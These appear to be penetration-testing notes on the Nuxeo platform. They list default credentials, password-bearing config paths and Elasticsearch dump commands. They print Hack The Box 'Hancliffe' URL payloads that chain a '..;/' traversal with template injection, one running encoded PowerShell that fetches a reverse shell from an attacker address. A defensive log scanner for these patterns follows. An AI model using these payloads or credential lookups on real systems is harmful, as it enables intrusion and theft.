Nuxeo
Overview #
- Collaboration system
- Tech stack
- Tomcat
- Elasticsearch
- DB (PostgreSQL, MySQL)
Version Detection #
- You can see the copyright notice as well as the version information at the bottom of the login page
# Version is 10.2
Copyright © 2001-2022 Nuxeo and respective authors. Nuxeo Platform FT 10.2
Credentials #
# Default
Administrator:Administrator
# Some DB users to try
nuxeo
Interesting Files and Directories #
# Nuxeo config. DB passwords are stored here.
C:\programdata\nuxeo\conf\nuxeo.conf
# Some Tomcat config
conf/
# Per-user Nuxeo Shell (nxshell) settings and command history?
~/.nxshell
C:\users\svc_account\.nxshell\history
C:\users\svc_account\.nxshell\shell.properties
Interesting URL paths #
/nuxeo
/nuxeo/login.jsp
/nxserver
/nxstartup.faces
Interesting Database Tables #
users
digestauth
content
groups
userinfo
note
Interesting Elasticsearch Data #
curl 'http://localhost:9200/nuxeo-audit/_search?pretty=true'
curl 'http://localhost:9200/nuxeo/_search?pretty=true'
Vulnerabilities, Attacks and Exploits #
- Orange: How I Chained 4 Bugs (Features?) into RCE on Amazon Collaboration System
- Nuxeo 10 Authentication Bypass and RCE using SSTI
# HTB Hancliffe payload. Note the `/maintenance/..;/` segment: it relies on a
# URI parsing vulnerability to reach login.jsp, which is why it is there.
http://hancliffe/maintenance/..;/login.jsp/pwn$%7B7+7%7D.xhtml
# Another payload, this time with a PowerShell encoded command
http://hancliffe/maintenance/..;/login.jsp/pwn$%7B%22%22.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22powershell%20-encodedcommand%20SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMANAAvAEkAbgB2AG8AawBlAC0AUABvAHcAZQByAFMAaABlAGwAbABUAGMAcAAuAHAAcwAxACcAKQA=%22,null).waitFor()%7D.xhtml
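Added detection example (not part of the original notes): a small scanner over constructed Tomcat/Apache-style access-log lines that flags the `..;/` path segment and the `${...}` expression in a `.xhtml` request that the payloads above rely on. The log lines and IPs are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in common log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /nuxeo/login.jsp HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /maintenance/..;/login.jsp/pwn$%7B7+7%7D.xhtml HTTP/1.1" 200 812
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /maintenance/..;/login.jsp/pwn$%7B%22%22.getClass().forName(%22java.lang.Runtime%22)%7D.xhtml HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /nuxeo/nxstartup.faces HTTP/1.1" 302 0
"""

# ip, timestamp, method, request path, status; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_request(raw_path):
    """Return the indicator names that match one request path ([] = nothing suspicious)."""
    # Decode once so %7B / %22 become { and "; a double-encoded request would need
    # a second unquote, so decode again if your front end is known to do that.
    path = unquote(raw_path)
    hits = []
    if '..;/' in path:
        # Tomcat treats ';' as a path-parameter delimiter, so '..;' can act as '..'
        # for Tomcat while a front-end proxy sees an ordinary segment.
        hits.append('semicolon_path_traversal')
    if path.lower().endswith('.xhtml') and '${' in path:
        # EL expression embedded in a .xhtml view name, as in pwn${7+7}.xhtml
        hits.append('el_expression_in_xhtml_uri')
    if 'java.lang.Runtime' in path or 'getRuntime' in path:
        hits.append('runtime_exec_in_uri')
    return hits


def scan_log(text):
    """Return (ip, raw_path, indicators) for every suspicious request in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m['path'])
        if hits:
            findings.append((m['ip'], m['path'], hits))
    return findings


if __name__ == '__main__':
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(ip, ', '.join(hits), path, sep='\t')
```

Feed real Tomcat or proxy access logs into `scan_log`; `semicolon_path_traversal` on its own is worth alerting on, since legitimate clients do not send `..;/` segments.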